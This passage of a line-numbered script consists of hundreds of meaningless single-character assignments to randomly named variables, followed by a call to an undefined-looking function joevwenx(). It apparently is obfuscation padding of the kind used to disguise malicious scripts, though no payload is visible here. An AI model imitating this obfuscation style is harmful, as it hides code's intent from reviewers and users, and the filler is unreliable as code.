751 | fqqoxrc = "C"; | |
752 | fqqoxrc = "k"; | |
753 | fqqoxrc = "B"; | |
754 | fqqoxrc = "q"; | |
755 | fqqoxrc = "U"; | |
756 | fqqoxrc = "j"; | |
757 | fqqoxrc = "O"; | |
758 | fqqoxrc = "j"; | |
759 | fqqoxrc = "X"; | |
760 | fqqoxrc = "p"; | |
761 | fqqoxrc = "L"; | |
762 | fqqoxrc = "W"; | |
763 | fqqoxrc = "G"; | |
764 | fqqoxrc = "W"; | |
765 | fqqoxrc = "U"; | |
766 | fqqoxrc = "a"; | |
767 | fqqoxrc = "I"; | |
768 | fqqoxrc = "h"; | |
769 | fqqoxrc = "e"; | |
770 | fqqoxrc = "c"; | |
771 | fqqoxrc = "h"; | |
772 | fqqoxrc = "n"; | |
773 | fqqoxrc = "c"; | |
774 | fqqoxrc = "P"; | |
775 | fqqoxrc = "f"; | |
776 | fqqoxrc = "S"; | |
777 | fqqoxrc = "I"; | |
778 | fqqoxrc = "L"; | |
779 | fqqoxrc = "r"; | |
780 | jxkfmonce = "N"; | |
781 | jxkfmonce = "Z"; | |
782 | jxkfmonce = "e"; | |
783 | jxkfmonce = "N"; | |
784 | jxkfmonce = "A"; | |
785 | jxkfmonce = "j"; | |
786 | jxkfmonce = "c"; | |
787 | jxkfmonce = "d"; | |
788 | jxkfmonce = "q"; | |
789 | jxkfmonce = "u"; | |
790 | jxkfmonce = "F"; | |
791 | jxkfmonce = "r"; | |
792 | jxkfmonce = "w"; | |
793 | jxkfmonce = "F"; | |
794 | jxkfmonce = "F"; | |
795 | jxkfmonce = "Z"; | |
796 | jxkfmonce = "v"; | |
797 | jxkfmonce = "L"; | |
798 | jxkfmonce = "j"; | |
799 | jxkfmonce = "U"; | |
800 | jxkfmonce = "o"; | |
801 | jxkfmonce = "x"; | |
802 | jxkfmonce = "p"; | |
803 | jxkfmonce = "m"; | |
804 | jxkfmonce = "Z"; | |
805 | jxkfmonce = "h"; | |
806 | jxkfmonce = "p"; | |
807 | jxkfmonce = "Z"; | |
808 | jxkfmonce = "V"; | |
809 | jxkfmonce = "K"; | |
810 | jxkfmonce = "B"; | |
811 | jxkfmonce = "k"; | |
812 | jxkfmonce = "o"; | |
813 | jxkfmonce = "u"; | |
814 | jxkfmonce = "b"; | |
815 | jxkfmonce = "f"; | |
816 | bkstmyq = "T"; | |
817 | bkstmyq = "m"; | |
818 | bkstmyq = "s"; | |
819 | bkstmyq = "H"; | |
820 | bkstmyq = "a"; | |
821 | bkstmyq = "t"; | |
822 | bkstmyq = "n"; | |
823 | bkstmyq = "H"; | |
824 | bkstmyq = "D"; | |
825 | bkstmyq = "C"; | |
826 | bkstmyq = "S"; | |
827 | bkstmyq = "S"; | |
828 | bkstmyq = "K"; | |
829 | bkstmyq = "q"; | |
830 | bkstmyq = "c"; | |
831 | bkstmyq = "Q"; | |
832 | bkstmyq = "C"; | |
833 | bkstmyq = "h"; | |
834 | bkstmyq = "T"; | |
835 | bkstmyq = "r"; | |
836 | bkstmyq = "y"; | |
837 | bkstmyq = "Z"; | |
838 | bkstmyq = "U"; | |
839 | bkstmyq = "h"; | |
840 | bkstmyq = "Z"; | |
841 | bkstmyq = "n"; | |
842 | bkstmyq = "/"; | |
843 | wwopb = "g"; | |
844 | wwopb = "x"; | |
845 | wwopb = "d"; | |
846 | wwopb = "S"; | |
847 | wwopb = "q"; | |
848 | wwopb = "f"; | |
849 | wwopb = "d"; | |
850 | wwopb = "d"; | |
851 | wwopb = "f"; | |
852 | wwopb = "Z"; | |
853 | wwopb = "f"; | |
854 | wwopb = "V"; | |
855 | wwopb = "w"; | |
856 | wwopb = "c"; | |
857 | wwopb = "Y"; | |
858 | wwopb = "L"; | |
859 | wwopb = "H"; | |
860 | ruqqctje = "U"; | |
861 | ruqqctje = "h"; | |
862 | ruqqctje = "M"; | |
863 | ruqqctje = "o"; | |
864 | ruqqctje = "T"; | |
865 | ruqqctje = "I"; | |
866 | ruqqctje = "h"; | |
867 | ruqqctje = "G"; | |
868 | ruqqctje = "o"; | |
869 | ruqqctje = "p"; | |
870 | ruqqctje = "X"; | |
871 | ruqqctje = "b"; | |
872 | ruqqctje = "i"; | |
873 | ruqqctje = "U"; | |
874 | ruqqctje = "Z"; | |
875 | ruqqctje = "O"; | |
876 | ruqqctje = "n"; | |
877 | ruqqctje = "Y"; | |
878 | ruqqctje = "d"; | |
879 | ruqqctje = "E"; | |
880 | ruqqctje = "p"; | |
881 | ruqqctje = "a"; | |
882 | ruqqctje = "G"; | |
883 | ruqqctje = "Z"; | |
884 | ruqqctje = "b"; | |
885 | ruqqctje = "c"; | |
886 | ruqqctje = "i"; | |
887 | ruqqctje = "l"; | |
888 | ruqqctje = "N"; | |
889 | ruqqctje = "G"; | |
890 | ruqqctje = "n"; | |
891 | ruqqctje = "D"; | |
892 | ruqqctje = "T"; | |
893 | ruqqctje = "A"; | |
894 | ruqqctje = "C"; | |
895 | ruqqctje = "u"; | |
896 | ruqqctje = "q"; | |
897 | oedujw = "J"; | |
898 | oedujw = "r"; | |
899 | oedujw = "B"; | |
900 | oedujw = "S"; | |
901 | oedujw = "O"; | |
902 | oedujw = "Z"; | |
903 | oedujw = "x"; | |
904 | oedujw = "b"; | |
905 | oedujw = "W"; | |
906 | oedujw = "D"; | |
907 | oedujw = "V"; | |
908 | oedujw = "D"; | |
909 | oedujw = "U"; | |
910 | oedujw = "v"; | |
911 | oedujw = "p"; | |
912 | oedujw = "g"; | |
913 | oedujw = "G"; | |
914 | oedujw = "p"; | |
915 | oedujw = "b"; | |
916 | oedujw = "I"; | |
917 | oedujw = "Y"; | |
918 | oedujw = "k"; | |
919 | oedujw = "q"; | |
920 | oedujw = "C"; | |
921 | oedujw = "E"; | |
922 | oedujw = "F"; | |
923 | oedujw = "L"; | |
924 | oedujw = "E"; | |
925 | hgrmf = "l"; | |
926 | hgrmf = "S"; | |
927 | hgrmf = "L"; | |
928 | hgrmf = "n"; | |
929 | hgrmf = "w"; | |
930 | hgrmf = "J"; | |
931 | hgrmf = "s"; | |
932 | hgrmf = "Z"; | |
933 | hgrmf = "a"; | |
934 | hgrmf = "K"; | |
935 | hgrmf = "n"; | |
936 | hgrmf = "r"; | |
937 | hgrmf = "W"; | |
938 | hgrmf = "M"; | |
939 | hgrmf = "v"; | |
940 | hgrmf = "r"; | |
941 | hgrmf = "S"; | |
942 | hgrmf = "b"; | |
943 | hgrmf = "m"; | |
944 | hgrmf = "u"; | |
945 | hgrmf = "O"; | |
946 | hgrmf = "v"; | |
947 | hgrmf = "z"; | |
948 | hgrmf = "B"; | |
949 | hgrmf = "C"; | |
950 | hgrmf = "O"; | |
951 | hgrmf = "a"; | |
952 | hgrmf = "Z"; | |
953 | hgrmf = "b"; | |
954 | hgrmf = "t"; | |
955 | hgrmf = "u"; | |
956 | hgrmf = "g"; | |
957 | hgrmf = "_"; | |
958 | perpysr = "f"; | |
959 | perpysr = "U"; | |
960 | perpysr = "j"; | |
961 | perpysr = "j"; | |
962 | perpysr = "W"; | |
963 | perpysr = "x"; | |
964 | perpysr = "E"; | |
965 | perpysr = "T"; | |
966 | perpysr = "F"; | |
967 | perpysr = "n"; | |
968 | perpysr = "p"; | |
969 | perpysr = "S"; | |
970 | perpysr = "N"; | |
971 | perpysr = "g"; | |
972 | perpysr = "W"; | |
973 | perpysr = "l"; | |
974 | perpysr = "y"; | |
975 | perpysr = "C"; | |
976 | perpysr = "G"; | |
977 | perpysr = "u"; | |
978 | perpysr = "X"; | |
979 | perpysr = "n"; | |
980 | perpysr = "T"; | |
981 | perpysr = "R"; | |
982 | perpysr = "j"; | |
983 | perpysr = "R"; | |
984 | perpysr = "W"; | |
985 | perpysr = "B"; | |
986 | perpysr = "G"; | |
987 | perpysr = "n"; | |
988 | perpysr = "B"; | |
989 | perpysr = "w"; | |
990 | perpysr = "E"; | |
991 | perpysr = "F"; | |
992 | perpysr = "o"; | |
993 | bdvqptdiu = "p"; | |
994 | bdvqptdiu = "v"; | |
995 | bdvqptdiu = "v"; | |
996 | bdvqptdiu = "I"; | |
997 | bdvqptdiu = "y"; | |
998 | bdvqptdiu = "m"; | |
999 | bdvqptdiu = "p"; | |
1000 | bdvqptdiu = "B"; | |
1001 | bdvqptdiu = "m"; | |
1002 | bdvqptdiu = "C"; | |
1003 | bdvqptdiu = "N"; | |
1004 | bdvqptdiu = "q"; | |
1005 | bdvqptdiu = "P"; | |
1006 | pwculs = "K"; | |
1007 | pwculs = "e"; | |
1008 | pwculs = "H"; | |
1009 | pwculs = "Y"; | |
1010 | pwculs = "u"; | |
1011 | pwculs = "r"; | |
1012 | pwculs = "p"; | |
1013 | pwculs = "i"; | |
1014 | pwculs = "l"; | |
1015 | pwculs = "v"; | |
1016 | pwculs = "Q"; | |
1017 | pwculs = "z"; | |
1018 | pwculs = "V"; | |
1019 | pwculs = "u"; | |
1020 | pwculs = "u"; | |
1021 | pwculs = "J"; | |
1022 | pwculs = "D"; | |
1023 | pwculs = "D"; | |
1024 | pwculs = "P"; | |
1025 | pwculs = "o"; | |
1026 | pwculs = "T"; | |
1027 | pwculs = "n"; | |
1028 | pwculs = "l"; | |
1029 | pwculs = "Y"; | |
1030 | pwculs = "d"; | |
1031 | pwculs = "%"; | |
1032 | ufuqlud = "I"; | |
1033 | ufuqlud = "Z"; | |
1034 | ufuqlud = "u"; | |
1035 | ufuqlud = "C"; | |
1036 | ufuqlud = "R"; | |
1037 | tbjhype = "T"; | |
1038 | tbjhype = "y"; | |
1039 | tbjhype = "c"; | |
1040 | tbjhype = "o"; | |
1041 | tbjhype = "q"; | |
1042 | tbjhype = "l"; | |
1043 | tbjhype = "l"; | |
1044 | tbjhype = "d"; | |
1045 | tbjhype = "D"; | |
1046 | tbjhype = "k"; | |
1047 | tbjhype = "e"; | |
1048 | tbjhype = "m"; | |
1049 | tbjhype = "k"; | |
1050 | tbjhype = "d"; | |
1051 | tbjhype = "S"; | |
1052 | tbjhype = "o"; | |
1053 | tbjhype = "o"; | |
1054 | tbjhype = "k"; | |
1055 | tbjhype = "s"; | |
1056 | tbjhype = "V"; | |
1057 | tbjhype = "b"; | |
1058 | tbjhype = "y"; | |
1059 | tbjhype = "W"; | |
1060 | tbjhype = "X"; | |
1061 | tbjhype = "v"; | |
1062 | tbjhype = "g"; | |
1063 | tbjhype = "i"; | |
1064 | tbjhype = "O"; | |
1065 | tbjhype = "L"; | |
1066 | tbjhype = "h"; | |
1067 | tbjhype = "g"; | |
1068 | tbjhype = "X"; | |
1069 | tbjhype = "i"; | |
1070 | tbjhype = "g"; | |
1071 | tbjhype = "K"; | |
1072 | tbjhype = "T"; | |
1073 | tbjhype = "d"; | |
1074 | tbjhype = "b"; | |
1075 | tbjhype = "z"; | |
1076 | tbjhype = "q"; | |
1077 | tbjhype = "E"; | |
1078 | tbjhype = "t"; | |
1079 | tbjhype = "o"; | |
1080 | tbjhype = "S"; | |
1081 | pvreznniw = "o"; | |
1082 | pvreznniw = "h"; | |
1083 | pvreznniw = "r"; | |
1084 | pvreznniw = "a"; | |
1085 | pvreznniw = "V"; | |
1086 | pvreznniw = "Q"; | |
1087 | pvreznniw = "P"; | |
1088 | pvreznniw = "j"; | |
1089 | pvreznniw = "C"; | |
1090 | pvreznniw = "z"; | |
1091 | pvreznniw = "t"; | |
1092 | pvreznniw = "t"; | |
1093 | pvreznniw = "O"; | |
1094 | pvreznniw = "w"; | |
1095 | pvreznniw = "u"; | |
1096 | pvreznniw = "y"; | |
1097 | pvreznniw = "F"; | |
1098 | pvreznniw = "a"; | |
1099 | pvreznniw = "v"; | |
1100 | pvreznniw = "d"; | |
1101 | pvreznniw = "W"; | |
1102 | pvreznniw = "N"; | |
1103 | pvreznniw = "P"; | |
1104 | pvreznniw = "l"; | |
1105 | pvreznniw = "A"; | |
1106 | pvreznniw = "u"; | |
1107 | pvreznniw = "G"; | |
1108 | pvreznniw = "z"; | |
1109 | pvreznniw = "4"; | |
1110 | hevbapie = "L"; | |
1111 | hevbapie = "g"; | |
1112 | hevbapie = "x"; | |
1113 | hevbapie = "I"; | |
1114 | hevbapie = "s"; | |
1115 | hevbapie = "Z"; | |
1116 | hevbapie = "h"; | |
1117 | hevbapie = "Y"; | |
1118 | hevbapie = "L"; | |
1119 | hevbapie = "b"; | |
1120 | hevbapie = "l"; | |
1121 | hevbapie = "B"; | |
1122 | hevbapie = "i"; | |
1123 | hevbapie = "A"; | |
1124 | hevbapie = "Y"; | |
1125 | hevbapie = "D"; | |
1126 | hevbapie = "Q"; | |
1127 | hevbapie = "B"; | |
1128 | hevbapie = "9"; | |
1129 | wdpwd = "S"; | |
1130 | wdpwd = "E"; | |
1131 | wdpwd = "h"; | |
1132 | wdpwd = "N"; | |
1133 | wdpwd = "g"; | |
1134 | wdpwd = "h"; | |
1135 | wdpwd = "j"; | |
1136 | wdpwd = "r"; | |
1137 | wdpwd = "v"; | |
1138 | wdpwd = "h"; | |
1139 | wdpwd = "v"; | |
1140 | wdpwd = "b"; | |
1141 | wdpwd = "O"; | |
1142 | wdpwd = "t"; | |
1143 | wdpwd = "q"; | |
1144 | wdpwd = "v"; | |
1145 | wdpwd = "a"; | |
1146 | wdpwd = "v"; | |
1147 | pdyvymf = "h"; | |
1148 | pdyvymf = "K"; | |
1149 | pdyvymf = "d"; | |
1150 | pdyvymf = "f"; | |
1151 | pdyvymf = "b"; | |
1152 | pdyvymf = "q"; | |
1153 | pdyvymf = "M"; | |
1154 | pdyvymf = "v"; | |
1155 | pdyvymf = "i"; | |
1156 | pdyvymf = "H"; | |
1157 | pdyvymf = "v"; | |
1158 | pdyvymf = "P"; | |
1159 | pdyvymf = "d"; | |
1160 | pdyvymf = "c"; | |
1161 | pdyvymf = "c"; | |
1162 | pdyvymf = "M"; | |
1163 | pdyvymf = "L"; | |
1164 | pdyvymf = "w"; | |
1165 | pdyvymf = "P"; | |
1166 | pdyvymf = "B"; | |
1167 | pdyvymf = "r"; | |
1168 | pdyvymf = "W"; | |
1169 | pdyvymf = "J"; | |
1170 | pdyvymf = "H"; | |
1171 | pdyvymf = "L"; | |
1172 | pdyvymf = "f"; | |
1173 | pdyvymf = "i"; | |
1174 | pdyvymf = "n"; | |
1175 | phbhkhb = "a"; | |
1176 | phbhkhb = "S"; | |
1177 | phbhkhb = "f"; | |
1178 | phbhkhb = "l"; | |
1179 | phbhkhb = "H"; | |
1180 | phbhkhb = "p"; | |
1181 | phbhkhb = "w"; | |
1182 | phbhkhb = "g"; | |
1183 | phbhkhb = "N"; | |
1184 | phbhkhb = "B"; | |
1185 | phbhkhb = "H"; | |
1186 | phbhkhb = "q"; | |
1187 | phbhkhb = "C"; | |
1188 | phbhkhb = "F"; | |
1189 | phbhkhb = "H"; | |
1190 | phbhkhb = "U"; | |
1191 | phbhkhb = "M"; | |
1192 | phbhkhb = "t"; | |
1193 | phbhkhb = "w"; | |
1194 | phbhkhb = "r"; | |
1195 | phbhkhb = "Y"; | |
1196 | phbhkhb = "c"; | |
1197 | bjgmwq = "K"; | |
1198 | bjgmwq = "U"; | |
1199 | bjgmwq = "p"; | |
1200 | bjgmwq = "y"; | |
1201 | bjgmwq = "m"; | |
1202 | bjgmwq = "a"; | |
1203 | bjgmwq = "X"; | |
1204 | bjgmwq = "X"; | |
1205 | bjgmwq = "z"; | |
1206 | bjgmwq = "Q"; | |
1207 | egxvavw = "A"; | |
1208 | egxvavw = "U"; | |
1209 | egxvavw = "R"; | |
1210 | egxvavw = "x"; | |
1211 | egxvavw = "K"; | |
1212 | egxvavw = "a"; | |
1213 | egxvavw = "S"; | |
1214 | egxvavw = "K"; | |
1215 | egxvavw = "S"; | |
1216 | egxvavw = "a"; | |
1217 | egxvavw = "a"; | |
1218 | egxvavw = "c"; | |
1219 | egxvavw = "t"; | |
1220 | egxvavw = "H"; | |
1221 | egxvavw = "t"; | |
1222 | egxvavw = "H"; | |
1223 | egxvavw = "A"; | |
1224 | egxvavw = "J"; | |
1225 | egxvavw = "m"; | |
1226 | egxvavw = "F"; | |
1227 | egxvavw = "r"; | |
1228 | egxvavw = "L"; | |
1229 | egxvavw = "t"; | |
1230 | egxvavw = "P"; | |
1231 | egxvavw = "B"; | |
1232 | egxvavw = "w"; | |
1233 | egxvavw = "i"; | |
1234 | egxvavw = "T"; | |
1235 | egxvavw = "q"; | |
1236 | egxvavw = "U"; | |
1237 | egxvavw = "A"; | |
1238 | egxvavw = "j"; | |
1239 | egxvavw = "a"; | |
1240 | abnnvryl = "b"; | |
1241 | qbshvz = "Z"; | |
1242 | qbshvz = "d"; | |
1243 | qbshvz = "5"; | |
1244 | tyjfs = "i"; | |
1245 | tyjfs = "R"; | |
1246 | tyjfs = "n"; | |
1247 | tyjfs = "g"; | |
1248 | tyjfs = "w"; | |
1249 | vjjtvzzii = "w"; | |
1250 | vjjtvzzii = "o"; | |
1251 | vjjtvzzii = "n"; | |
1252 | vjjtvzzii = "K"; | |
1253 | vjjtvzzii = "T"; | |
1254 | vjjtvzzii = "L"; | |
1255 | gciioga = "j"; | |
1256 | gciioga = "G"; | |
1257 | gciioga = "b"; | |
1258 | gciioga = "C"; | |
1259 | gciioga = "z"; | |
1260 | gciioga = "h"; | |
1261 | gciioga = "C"; | |
1262 | gciioga = "X"; | |
1263 | gciioga = "G"; | |
1264 | gciioga = "o"; | |
1265 | gciioga = "T"; | |
1266 | gciioga = "Z"; | |
1267 | gciioga = "H"; | |
1268 | gciioga = "j"; | |
1269 | gciioga = "O"; | |
1270 | gciioga = "f"; | |
1271 | gciioga = "f"; | |
1272 | gciioga = "q"; | |
1273 | gciioga = "R"; | |
1274 | gciioga = "T"; | |
1275 | gciioga = "y"; | |
1276 | gciioga = "h"; | |
1277 | gciioga = "i"; | |
1278 | gciioga = "f"; | |
1279 | gciioga = "O"; | |
1280 | gciioga = "O"; | |
1281 | gciioga = "p"; | |
1282 | gciioga = "K"; | |
1283 | gciioga = "b"; | |
1284 | gciioga = "T"; | |
1285 | gciioga = "P"; | |
1286 | gciioga = "C"; | |
1287 | gznricnk = "x"; | |
1288 | gznricnk = "M"; | |
1289 | gznricnk = "B"; | |
1290 | gznricnk = "G"; | |
1291 | gznricnk = "b"; | |
1292 | gznricnk = "T"; | |
1293 | gznricnk = "k"; | |
1294 | gznricnk = "y"; | |
1295 | gznricnk = "N"; | |
1296 | gznricnk = "H"; | |
1297 | gznricnk = "G"; | |
1298 | gznricnk = "k"; | |
1299 | gznricnk = "y"; | |
1300 | gznricnk = "M"; | |
1301 | gznricnk = "x"; | |
1302 | gznricnk = "k"; | |
1303 | gznricnk = "P"; | |
1304 | gznricnk = "o"; | |
1305 | gznricnk = "d"; | |
1306 | gznricnk = "E"; | |
1307 | gznricnk = "X"; | |
1308 | gznricnk = "b"; | |
1309 | gznricnk = "g"; | |
1310 | gznricnk = "h"; | |
1311 | gznricnk = "3"; | |
1312 | mixzh = "f"; | |
1313 | mixzh = "v"; | |
1314 | mixzh = "d"; | |
1315 | mixzh = "j"; | |
1316 | mixzh = "b"; | |
1317 | mixzh = "V"; | |
1318 | mixzh = "V"; | |
1319 | mixzh = "B"; | |
1320 | mixzh = "O"; | |
1321 | mixzh = "L"; | |
1322 | mixzh = "A"; | |
1323 | mixzh = "t"; | |
1324 | mixzh = "i"; | |
1325 | mixzh = "I"; | |
1326 | mixzh = "O"; | |
1327 | mixzh = "t"; | |
1328 | mixzh = "Y"; | |
1329 | mixzh = "n"; | |
1330 | mixzh = "H"; | |
1331 | mixzh = "d"; | |
1332 | mixzh = "C"; | |
1333 | mixzh = "h"; | |
1334 | mixzh = "O"; | |
1335 | mixzh = "i"; | |
1336 | mixzh = "W"; | |
1337 | mixzh = "H"; | |
1338 | mixzh = "p"; | |
1339 | mixzh = "A"; | |
1340 | mixzh = "j"; | |
1341 | mixzh = "V"; | |
1342 | mixzh = "s"; | |
1343 | mixzh = "F"; | |
1344 | mixzh = "A"; | |
1345 | mixzh = "Q"; | |
1346 | mixzh = "t"; | |
1347 | mixzh = "V"; | |
1348 | mixzh = "u"; | |
1349 | mixzh = "z"; | |
1350 | mixzh = "M"; | |
1351 | mixzh = "r"; | |
1352 | mixzh = "N"; | |
1353 | mixzh = "U"; | |
1354 | mixzh = "Q"; | |
1355 | mixzh = ":"; | |
1356 | qwvkrky = "c"; | |
1357 | qwvkrky = "O"; | |
1358 | qwvkrky = "X"; | |
1359 | qwvkrky = "x"; | |
1360 | qwvkrky = "x"; | |
1361 | qwvkrky = "I"; | |
1362 | qwvkrky = "M"; | |
1363 | qwvkrky = "V"; | |
1364 | qwvkrky = "j"; | |
1365 | qwvkrky = "q"; | |
1366 | qwvkrky = "b"; | |
1367 | qwvkrky = "O"; | |
1368 | qwvkrky = "O"; | |
1369 | qwvkrky = "U"; | |
1370 | qwvkrky = "M"; | |
1371 | qwvkrky = "D"; | |
1372 | qwvkrky = "b"; | |
1373 | qwvkrky = "h"; | |
1374 | qwvkrky = "O"; | |
1375 | qwvkrky = "h"; | |
1376 | qwvkrky = "v"; | |
1377 | qwvkrky = "S"; | |
1378 | qwvkrky = "E"; | |
1379 | qwvkrky = "c"; | |
1380 | qwvkrky = "D"; | |
1381 | qwvkrky = "I"; | |
1382 | fsumldgag = "Q"; | |
1383 | fsumldgag = "Q"; | |
1384 | fsumldgag = "P"; | |
1385 | fsumldgag = "V"; | |
1386 | fsumldgag = "H"; | |
1387 | fsumldgag = "R"; | |
1388 | fsumldgag = "e"; | |
1389 | fsumldgag = "u"; | |
1390 | fsumldgag = "z"; | |
1391 | fsumldgag = "j"; | |
1392 | fsumldgag = "p"; | |
1393 | fsumldgag = "h"; | |
1394 | fsumldgag = "S"; | |
1395 | fsumldgag = "h"; | |
1396 | fsumldgag = "t"; | |
1397 | fsumldgag = "M"; | |
1398 | fsumldgag = "d"; | |
1399 | fsumldgag = "D"; | |
1400 | fsumldgag = "k"; | |
1401 | fsumldgag = "t"; | |
1402 | fsumldgag = "W"; | |
1403 | fsumldgag = "W"; | |
1404 | fsumldgag = "Q"; | |
1405 | fsumldgag = "K"; | |
1406 | fsumldgag = "k"; | |
1407 | fsumldgag = "X"; | |
1408 | fsumldgag = "T"; | |
1409 | fsumldgag = "Y"; | |
1410 | fsumldgag = "v"; | |
1411 | fsumldgag = "r"; | |
1412 | fsumldgag = "J"; | |
1413 | fsumldgag = "j"; | |
1414 | fsumldgag = "f"; | |
1415 | fsumldgag = "C"; | |
1416 | fsumldgag = "j"; | |
1417 | fsumldgag = "m"; | |
1418 | fsumldgag = "\""; | |
1419 | lsdthbgk = "s"; | |
1420 | lsdthbgk = "l"; | |
1421 | lsdthbgk = "Q"; | |
1422 | lsdthbgk = "u"; | |
1423 | lsdthbgk = "Z"; | |
1424 | lsdthbgk = "L"; | |
1425 | lsdthbgk = "C"; | |
1426 | lsdthbgk = "t"; | |
1427 | lsdthbgk = "E"; | |
1428 | lsdthbgk = "i"; | |
1429 | lsdthbgk = "I"; | |
1430 | lsdthbgk = "F"; | |
1431 | lsdthbgk = "d"; | |
1432 | lsdthbgk = "T"; | |
1433 | lsdthbgk = "I"; | |
1434 | lsdthbgk = "I"; | |
1435 | lsdthbgk = "R"; | |
1436 | lsdthbgk = "."; | |
1437 | jpxltt = "t"; | |
1438 | jpxltt = "k"; | |
1439 | jpxltt = "W"; | |
1440 | jpxltt = "Z"; | |
1441 | jpxltt = "n"; | |
1442 | jpxltt = "V"; | |
1443 | jpxltt = "i"; | |
1444 | jpxltt = "\\"; | |
1445 | tytrnt = "a"; | |
1446 | tytrnt = "y"; | |
1447 | tytrnt = "u"; | |
1448 | tytrnt = "D"; | |
1449 | tytrnt = "j"; | |
1450 | tytrnt = "T"; | |
1451 | tytrnt = "y"; | |
1452 | tytrnt = "u"; | |
1453 | tytrnt = "y"; | |
1454 | tytrnt = "o"; | |
1455 | tytrnt = "a"; | |
1456 | tytrnt = "d"; | |
1457 | tytrnt = "w"; | |
1458 | tytrnt = "n"; | |
1459 | tytrnt = "d"; | |
1460 | tytrnt = "r"; | |
1461 | tytrnt = "k"; | |
1462 | tytrnt = "D"; | |
1463 | tytrnt = "r"; | |
1464 | tytrnt = "B"; | |
1465 | tytrnt = "C"; | |
1466 | tytrnt = "H"; | |
1467 | tytrnt = "Q"; | |
1468 | tytrnt = "y"; | |
1469 | tytrnt = "S"; | |
1470 | tytrnt = "o"; | |
1471 | tytrnt = "Z"; | |
1472 | tytrnt = "q"; | |
1473 | tytrnt = "O"; | |
1474 | tytrnt = "g"; | |
1475 | tytrnt = "X"; | |
1476 | tytrnt = "o"; | |
1477 | tytrnt = "A"; | |
1478 | tytrnt = "x"; | |
1479 | tytrnt = "I"; | |
1480 | tytrnt = "c"; | |
1481 | tytrnt = "F"; | |
1482 | tytrnt = "S"; | |
1483 | tytrnt = "R"; | |
1484 | tytrnt = "d"; | |
1485 | tytrnt = "h"; | |
1486 | tytrnt = "U"; | |
1487 | tytrnt = "W"; | |
1488 | nkowll = "w"; | |
1489 | nkowll = "L"; | |
1490 | nkowll = "x"; | |
1491 | nkowll = "h"; | |
1492 | nkowll = "q"; | |
1493 | nkowll = "h"; | |
1494 | nkowll = "L"; | |
1495 | nkowll = "l"; | |
1496 | nkowll = "q"; | |
1497 | nkowll = "h"; | |
1498 | nkowll = "H"; | |
1499 | nkowll = "y"; | |
1500 | nkowll = "i"; | |
1501 | nkowll = "k"; | |
1502 | nkowll = "q"; | |
1503 | nkowll = "x"; | |
1504 | nkowll = "T"; | |
1505 | nkowll = "W"; | |
1506 | nkowll = "Z"; | |
1507 | nkowll = "r"; | |
1508 | nkowll = "G"; | |
1509 | nkowll = "y"; | |
1510 | nkowll = "P"; | |
1511 | nkowll = "G"; | |
1512 | nkowll = "v"; | |
1513 | nkowll = "O"; | |
1514 | nkowll = "-"; | |
1515 | qcerkynel = "K"; | |
1516 | qcerkynel = "j"; | |
1517 | qcerkynel = "v"; | |
1518 | qcerkynel = "O"; | |
1519 | qcerkynel = "r"; | |
1520 | qcerkynel = "n"; | |
1521 | qcerkynel = "r"; | |
1522 | qcerkynel = "M"; | |
1523 | qcerkynel = "D"; | |
1524 | qcerkynel = "q"; | |
1525 | qcerkynel = "X"; | |
1526 | qcerkynel = "t"; | |
1527 | qcerkynel = "m"; | |
1528 | qcerkynel = "C"; | |
1529 | qcerkynel = "x"; | |
1530 | qcerkynel = "I"; | |
1531 | qcerkynel = "H"; | |
1532 | qcerkynel = "D"; | |
1533 | qcerkynel = "A"; | |
1534 | qcerkynel = "E"; | |
1535 | qcerkynel = "M"; | |
1536 | qcerkynel = "U"; | |
1537 | qcerkynel = "K"; | |
1538 | qcerkynel = "J"; | |
1539 | qcerkynel = "R"; | |
1540 | qcerkynel = "h"; | |
1541 | qcerkynel = "X"; | |
1542 | qcerkynel = "e"; | |
1543 | qcerkynel = "i"; | |
1544 | qcerkynel = "x"; | |
1545 | qcerkynel = "J"; | |
1546 | qcerkynel = "D"; | |
1547 | qcerkynel = "u"; | |
1548 | qcerkynel = "L"; | |
1549 | qcerkynel = "F"; | |
1550 | qcerkynel = "K"; | |
1551 | qcerkynel = "U"; | |
1552 | qcerkynel = "e"; | |
1553 | qcerkynel = "o"; | |
1554 | qcerkynel = "c"; | |
1555 | qcerkynel = "q"; | |
1556 | qcerkynel = "T"; | |
1557 | zqwvkxty = "A"; | |
1558 | zqwvkxty = "j"; | |
1559 | zqwvkxty = "L"; | |
1560 | zqwvkxty = "K"; | |
1561 | zqwvkxty = "u"; | |
1562 | zqwvkxty = "i"; | |
1563 | zqwvkxty = "q"; | |
1564 | zqwvkxty = "K"; | |
1565 | zqwvkxty = "U"; | |
1566 | zqwvkxty = "W"; | |
1567 | zqwvkxty = "p"; | |
1568 | zqwvkxty = "M"; | |
1569 | zqwvkxty = "k"; | |
1570 | zqwvkxty = "s"; | |
1571 | zqwvkxty = "g"; | |
1572 | zqwvkxty = "P"; | |
1573 | zqwvkxty = "N"; | |
1574 | zqwvkxty = "L"; | |
1575 | zqwvkxty = "t"; | |
1576 | zqwvkxty = "a"; | |
1577 | zqwvkxty = "R"; | |
1578 | zqwvkxty = "s"; | |
1579 | zqwvkxty = "w"; | |
1580 | zqwvkxty = "a"; | |
1581 | zqwvkxty = "j"; | |
1582 | zqwvkxty = "j"; | |
1583 | zqwvkxty = "k"; | |
1584 | zqwvkxty = "P"; | |
1585 | zqwvkxty = "P"; | |
1586 | zqwvkxty = "J"; | |
1587 | zqwvkxty = "B"; | |
1588 | zqwvkxty = "R"; | |
1589 | zqwvkxty = "Z"; | |
1590 | zqwvkxty = "V"; | |
1591 | zqwvkxty = "w"; | |
1592 | zqwvkxty = "n"; | |
1593 | zqwvkxty = "m"; | |
1594 | rbbep = "b"; | |
1595 | rbbep = "V"; | |
1596 | rbbep = "C"; | |
1597 | rbbep = "f"; | |
1598 | rbbep = "n"; | |
1599 | rbbep = "k"; | |
1600 | rbbep = "R"; | |
1601 | rbbep = "g"; | |
1602 | rbbep = "h"; | |
1603 | rbbep = "S"; | |
1604 | rbbep = "Y"; | |
1605 | rbbep = "z"; | |
1606 | rbbep = "z"; | |
1607 | rbbep = "F"; | |
1608 | rbbep = "P"; | |
1609 | rbbep = "D"; | |
1610 | rbbep = "k"; | |
1611 | rbbep = "t"; | |
1612 | joevwenx ( ); |
|